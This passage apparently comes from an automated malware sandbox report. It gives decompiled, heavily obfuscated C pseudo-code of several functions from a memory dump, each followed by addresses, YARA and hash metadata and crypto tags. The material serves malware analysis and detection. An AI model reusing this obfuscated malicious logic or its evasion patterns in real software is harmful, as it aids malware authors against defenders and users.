									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00235D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}





















































                                              0x0023a0bd
                                              0x0023a0be
                                              0x0023a0c5
                                              0x0023a0c6
                                              0x0023a0c7
                                              0x0023a0cc
                                              0x0023a0d4
                                              0x0023a0d7
                                              0x0023a0e1
                                              0x0023a0e6
                                              0x0023a0eb
                                              0x0023a0f3
                                              0x0023a101
                                              0x0023a106
                                              0x0023a10c
                                              0x0023a114
                                              0x0023a119
                                              0x0023a121
                                              0x0023a129
                                              0x0023a131
                                              0x0023a139
                                              0x0023a141
                                              0x0023a149
                                              0x0023a151
                                              0x0023a15e
                                              0x0023a161
                                              0x0023a165
                                              0x0023a16d
                                              0x0023a175
                                              0x0023a17d
                                              0x0023a182
                                              0x0023a18a
                                              0x0023a192
                                              0x0023a19a
                                              0x0023a1a2
                                              0x0023a1aa
                                              0x0023a1b2
                                              0x0023a1ba
                                              0x0023a1c2
                                              0x0023a1c7
                                              0x0023a1d4
                                              0x0023a1d8
                                              0x0023a1e0
                                              0x0023a1e8
                                              0x0023a1f2
                                              0x0023a1f5
                                              0x0023a201
                                              0x0023a205
                                              0x0023a20d
                                              0x0023a215
                                              0x0023a21d
                                              0x0023a225
                                              0x0023a22d
                                              0x0023a232
                                              0x0023a23a
                                              0x0023a242
                                              0x0023a24a
                                              0x0023a256
                                              0x0023a259
                                              0x0023a265
                                              0x0023a268
                                              0x0023a26f
                                              0x0023a273
                                              0x0023a27b
                                              0x0023a283
                                              0x0023a28b
                                              0x0023a293
                                              0x0023a29b
                                              0x0023a2a3
                                              0x0023a2a8
                                              0x0023a2b0
                                              0x0023a2b8
                                              0x0023a2c0
                                              0x0023a2c8
                                              0x0023a2d0
                                              0x0023a2d8
                                              0x0023a2dd
                                              0x0023a2e5
                                              0x0023a2ea
                                              0x0023a2f2
                                              0x0023a2fa
                                              0x0023a2ff
                                              0x0023a307
                                              0x0023a30f
                                              0x0023a314
                                              0x0023a319
                                              0x0023a321
                                              0x0023a329
                                              0x0023a331
                                              0x0023a339
                                              0x0023a341
                                              0x0023a349
                                              0x0023a351
                                              0x0023a359
                                              0x0023a361
                                              0x0023a369
                                              0x0023a371
                                              0x0023a37c
                                              0x0023a384
                                              0x0023a38c
                                              0x0023a394
                                              0x0023a39c
                                              0x0023a3a4
                                              0x0023a3a9
                                              0x0023a3b1
                                              0x0023a3b9
                                              0x0023a3c1
                                              0x0023a3c9
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x0023a3d6
                                              0x0023a3d6
                                              0x0023a3d6
                                              0x0023a3d6
                                              0x0023a3dc
                                              0x00000000
                                              0x00000000
                                              0x0023a3e2
                                              0x0023a4cb
                                              0x00000000
                                              0x0023a3e8
                                              0x0023a3ee
                                              0x0023a592
                                              0x0023a598
                                              0x0023a59a
                                              0x0023a59a
                                              0x0023a5ad
                                              0x0023a5b2
                                              0x0023a5b6
                                              0x0023a59a
                                              0x0023a3f4
                                              0x0023a3f6
                                              0x0023a462
                                              0x0023a466
                                              0x0023a46a
                                              0x0023a46c
                                              0x0023a485
                                              0x0023a494
                                              0x0023a499
                                              0x0023a49c
                                              0x0023a4a0
                                              0x0023a4a1
                                              0x0023a4a6
                                              0x0023a4a7
                                              0x0023a4ad
                                              0x0023a4b1
                                              0x0023a4b1
                                              0x0023a4b6
                                              0x0023a4ba
                                              0x0023a4bf
                                              0x00000000
                                              0x0023a3f8
                                              0x0023a3fe
                                              0x0023a450
                                              0x0023a455
                                              0x0023a458
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x00000000
                                              0x0023a3d1
                                              0x0023a400
                                              0x0023a406
                                              0x00000000
                                              0x0023a40c
                                              0x0023a418
                                              0x0023a419
                                              0x0023a423
                                              0x0023a425
                                              0x0023a432
                                              0x00000000
                                              0x0023a432
                                              0x0023a406
                                              0x0023a3fe
                                              0x0023a3f6
                                              0x0023a3ee
                                              0x0023a5ba
                                              0x0023a5cf
                                              0x0023a5cf
                                              0x0023a4db
                                              0x0023a543
                                              0x0023a547
                                              0x0023a549
                                              0x0023a54f
                                              0x0023a551
                                              0x0023a55c
                                              0x0023a561
                                              0x0023a568
                                              0x0023a56b
                                              0x0023a56f
                                              0x0023a573
                                              0x0023a573
                                              0x0023a578
                                              0x0023a57f
                                              0x00000000
                                              0x0023a4dd
                                              0x0023a4e3
                                              0x0023a532
                                              0x0023a539
                                              0x00000000
                                              0x0023a4e5
                                              0x0023a4eb
                                              0x00000000
                                              0x0023a4f1
                                              0x0023a4f1
                                              0x0023a4f4
                                              0x0023a511
                                              0x0023a516
                                              0x0023a519
                                              0x0023a51b
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x00000000
                                              0x0023a3d1
                                              0x0023a3d1
                                              0x0023a4eb
                                              0x0023a4e3
                                              0x00000000
                                              0x0023a584
                                              0x0023a584
                                              0x00000000
                                              0x0023a590

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 2a$L$c~$g]ht$/$V=$_
                                              • API String ID: 0-445983283
                                              • Opcode ID: 36cabe2eea36f0663463007d41d1f7eb45458d77ad148662dea6fbad212e8662
                                              • Instruction ID: be7561e28a32d0ebb029b71a770a6d73ed85de49a417a4e92de81c2d3a768c00
                                              • Opcode Fuzzy Hash: 36cabe2eea36f0663463007d41d1f7eb45458d77ad148662dea6fbad212e8662
                                              • Instruction Fuzzy Hash: 4CD172B25187818FD368CF61D08991BBBE1FBC4718F60891DF5D6862A0C7B49919CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00237F1F, Relevance: 9.0, Strings: 7, Instructions: 237COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00237F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00237F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0022D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00237F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00237F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0022D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00237F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0022D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00237F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}














































                                              0x00237f1f
                                              0x00237f22
                                              0x00237f2c
                                              0x00237f34
                                              0x00237f40
                                              0x00237f42
                                              0x00237f44
                                              0x00237f48
                                              0x00237f4d
                                              0x00237f55
                                              0x00237f60
                                              0x00237f65
                                              0x00237f6b
                                              0x00237f73
                                              0x00237f7b
                                              0x00237f83
                                              0x00237f8b
                                              0x00237f93
                                              0x00237f9b
                                              0x00237fa0
                                              0x00237fa8
                                              0x00237fb0
                                              0x00237fb8
                                              0x00237fbd
                                              0x00237fc7
                                              0x00237fca
                                              0x00237fce
                                              0x00237fd6
                                              0x00237fe6
                                              0x00237fea
                                              0x00237ff2
                                              0x00237ffa
                                              0x00238002
                                              0x0023800a
                                              0x00238012
                                              0x0023801a
                                              0x00238022
                                              0x0023802a
                                              0x00238032
                                              0x0023803a
                                              0x00238042
                                              0x0023804a
                                              0x00238052
                                              0x0023805a
                                              0x00238062
                                              0x00238067
                                              0x0023806f
                                              0x00238077
                                              0x0023807f
                                              0x00238084
                                              0x0023808c
                                              0x00238094
                                              0x002380a0
                                              0x002380a3
                                              0x002380a7
                                              0x002380af
                                              0x002380b7
                                              0x002380bf
                                              0x002380c9
                                              0x002380cd
                                              0x002380d5
                                              0x002380dd
                                              0x002380e5
                                              0x002380ed
                                              0x002380f5
                                              0x0023810b
                                              0x0023810f
                                              0x00238114
                                              0x0023811c
                                              0x00238124
                                              0x00238134
                                              0x00238138
                                              0x00238144
                                              0x00238149
                                              0x0023814f
                                              0x00238157
                                              0x00238164
                                              0x00238165
                                              0x00238169
                                              0x00238171
                                              0x00238179
                                              0x00238181
                                              0x00238186
                                              0x0023818e
                                              0x00238196
                                              0x0023819b
                                              0x002381a3
                                              0x002381ab
                                              0x002381b3
                                              0x002381bb
                                              0x002381bf
                                              0x002381c7
                                              0x002381d4
                                              0x002381dd
                                              0x002381e1
                                              0x002381e9
                                              0x002381f6
                                              0x002381fa
                                              0x00238202
                                              0x0023820a
                                              0x00238218
                                              0x0023821c
                                              0x0023821c
                                              0x00238224
                                              0x00238224
                                              0x00238224
                                              0x00238224
                                              0x00238226
                                              0x00000000
                                              0x00000000
                                              0x0023822c
                                              0x002382c7
                                              0x002382c8
                                              0x002382cd
                                              0x002382d0
                                              0x002382d5
                                              0x00000000
                                              0x00238232
                                              0x00238238
                                              0x002382b5
                                              0x00000000
                                              0x0023823a
                                              0x00238240
                                              0x0023829d
                                              0x002382a1
                                              0x002382a6
                                              0x002382a9
                                              0x002382ae
                                              0x00000000
                                              0x00238242
                                              0x00238248
                                              0x0023827b
                                              0x0023827c
                                              0x00238281
                                              0x00238284
                                              0x00238289
                                              0x00000000
                                              0x0023824a
                                              0x00238250
                                              0x00000000
                                              0x00238256
                                              0x0023825e
                                              0x00238267
                                              0x00238267
                                              0x00238250
                                              0x00238248
                                              0x00238240
                                              0x00238238
                                              0x00238269
                                              0x00238272
                                              0x00238272
                                              0x002382e2
                                              0x00238368
                                              0x0023836c
                                              0x00238371
                                              0x00238374
                                              0x00238379
                                              0x00000000
                                              0x002382e4
                                              0x002382ea
                                              0x00238346
                                              0x00238347
                                              0x0023834c
                                              0x0023834f
                                              0x00238351
                                              0x00000000
                                              0x002382ec
                                              0x002382f2
                                              0x00238326
                                              0x0023832a
                                              0x0023832f
                                              0x00238332
                                              0x00238337
                                              0x00000000
                                              0x002382f4
                                              0x002382fa
                                              0x00000000
                                              0x002382fc
                                              0x00238304
                                              0x00238305
                                              0x0023830a
                                              0x0023830d
                                              0x00238312
                                              0x00000000
                                              0x00238312
                                              0x002382fa
                                              0x002382f2
                                              0x002382ea
                                              0x00000000
                                              0x0023837b
                                              0x0023837b
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ,H$9c%'$9c%'$S,$XW$bh$~
                                              • API String ID: 0-4263808623
                                              • Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                              • Instruction ID: 9430daf895a48d5db81e1183537003b9cc148bef3ade1f81d27c562b404759c0
                                              • Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                              • Instruction Fuzzy Hash: 31B153B29193818FD358CF25D98940BFBE1BBC4748F40891DF5869A260DBB5DA19CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002269A0, Relevance: 9.0, Strings: 7, Instructions: 215COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002269A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00228736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0022F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x23ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x23ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0023422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00236DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00221132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00239586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002276DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}










































                                              0x002269a0
                                              0x002269a3
                                              0x002269af
                                              0x002269b1
                                              0x002269b3
                                              0x002269b9
                                              0x002269c1
                                              0x002269c3
                                              0x002269c8
                                              0x002269cd
                                              0x002269d5
                                              0x002269dd
                                              0x002269e5
                                              0x002269ed
                                              0x002269f5
                                              0x002269fd
                                              0x00226a0b
                                              0x00226a10
                                              0x00226a16
                                              0x00226a1e
                                              0x00226a26
                                              0x00226a32
                                              0x00226a37
                                              0x00226a3d
                                              0x00226a42
                                              0x00226a4a
                                              0x00226a52
                                              0x00226a5a
                                              0x00226a5f
                                              0x00226a67
                                              0x00226a6f
                                              0x00226a77
                                              0x00226a7f
                                              0x00226a87
                                              0x00226a8c
                                              0x00226a94
                                              0x00226a9c
                                              0x00226aa4
                                              0x00226aac
                                              0x00226ab4
                                              0x00226abc
                                              0x00226ac4
                                              0x00226acc
                                              0x00226ad4
                                              0x00226adc
                                              0x00226ae4
                                              0x00226aec
                                              0x00226af1
                                              0x00226af9
                                              0x00226b01
                                              0x00226b09
                                              0x00226b11
                                              0x00226b1a
                                              0x00226b1d
                                              0x00226b21
                                              0x00226b29
                                              0x00226b31
                                              0x00226b39
                                              0x00226b41
                                              0x00226b49
                                              0x00226b51
                                              0x00226b59
                                              0x00226b61
                                              0x00226b69
                                              0x00226b71
                                              0x00226b79
                                              0x00226b81
                                              0x00226b8b
                                              0x00226b90
                                              0x00226b95
                                              0x00226b9d
                                              0x00226ba5
                                              0x00226bad
                                              0x00226bb5
                                              0x00226bbd
                                              0x00226bc5
                                              0x00226bd2
                                              0x00226bd6
                                              0x00226bde
                                              0x00226be6
                                              0x00226bee
                                              0x00226bf6
                                              0x00226bfe
                                              0x00226c06
                                              0x00226c0e
                                              0x00226c16
                                              0x00226c1e
                                              0x00226c1e
                                              0x00226c1e
                                              0x00226c23
                                              0x00000000
                                              0x00226c28
                                              0x00226c28
                                              0x00226c2e
                                              0x00226d35
                                              0x00226d36
                                              0x00226d39
                                              0x00226d3f
                                              0x00226d43
                                              0x00226d45
                                              0x00226d4e
                                              0x00226d53
                                              0x00226d58
                                              0x00226d5d
                                              0x00000000
                                              0x00226d5d
                                              0x00226d47
                                              0x00226d22
                                              0x00226d22
                                              0x00226cca
                                              0x00226cca
                                              0x00226ccf
                                              0x00226ccf
                                              0x00000000
                                              0x00226ccf
                                              0x00226c3a
                                              0x00000000
                                              0x00226d96
                                              0x00226c42
                                              0x00226d70
                                              0x00226d73
                                              0x00226d78
                                              0x00226d7b
                                              0x00000000
                                              0x00226d7b
                                              0x00226c4e
                                              0x00226d17
                                              0x00226d1d
                                              0x00000000
                                              0x00226d1d
                                              0x00226c5a
                                              0x00226cd9
                                              0x00226ceb
                                              0x00226cf0
                                              0x00226cf3
                                              0x00226cf6
                                              0x00226cfd
                                              0x00226d02
                                              0x00226d07
                                              0x00000000
                                              0x00226d07
                                              0x00226c5e
                                              0x00226c93
                                              0x00226cb0
                                              0x00226cb5
                                              0x00226cb8
                                              0x00226cbb
                                              0x00226cc2
                                              0x00226cc7
                                              0x00000000
                                              0x00226cc7
                                              0x00226c62
                                              0x00000000
                                              0x00000000
                                              0x00226c77
                                              0x00226c7c
                                              0x00226c7f
                                              0x00226c89
                                              0x00226c8e
                                              0x00000000
                                              0x00226d62
                                              0x00226d62
                                              0x00226d62
                                              0x00000000
                                              0x00226c28
                                              0x00226c28

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "=$'&/U$.V$?j$GX$y7X$k<
                                              • API String ID: 0-2482092835
                                              • Opcode ID: 85757b9c49541ef2ecfca8c28d94e78a67c3242d0e1525d9dd188e9fb22e5055
                                              • Instruction ID: 5bf049d2146eab755ef7b9b1c36f1911f4c1bb31760e8b8c8907383defea08ab
                                              • Opcode Fuzzy Hash: 85757b9c49541ef2ecfca8c28d94e78a67c3242d0e1525d9dd188e9fb22e5055
                                              • Instruction Fuzzy Hash: 11A194B2528341AFD358CF65D58A40BFBE1FBD4314F408A1DF48AA6260C7B5C919CF82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00221280, Relevance: 7.7, Strings: 6, Instructions: 157COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00221280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
